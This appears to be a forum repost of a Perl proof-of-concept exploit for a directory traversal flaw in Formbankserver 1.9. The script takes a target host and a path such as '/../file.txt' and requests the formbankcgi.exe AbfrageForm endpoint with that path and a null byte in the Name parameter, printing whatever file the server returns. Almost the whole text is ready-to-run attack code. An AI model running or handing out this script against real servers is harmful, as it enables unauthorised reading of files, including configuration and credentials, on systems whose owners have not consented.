Formbankserver 1.9 (Name) Directory Transversal Vulnerability
<p>[code]</p><pre>#!perl#found by Bl0od3r
#visit [url]http://dc3.dl.am[/url]
#download:[url]http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796[/url]
#developer:[url]http://www.fersch.de/formbankserver/[/url]
use LWP::Simple;
sub usage
{
die("file.pl host.com /../file.txt");
}
$host= $ARGV[0];
$file= $ARGV[1];
if (!$host) {
die("No Host.");
} ; if (!$file) {
die("No File.");
}
getprint "[url]http://".$host[/url] ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";
</pre><p>[/code]</p>
页:
[1]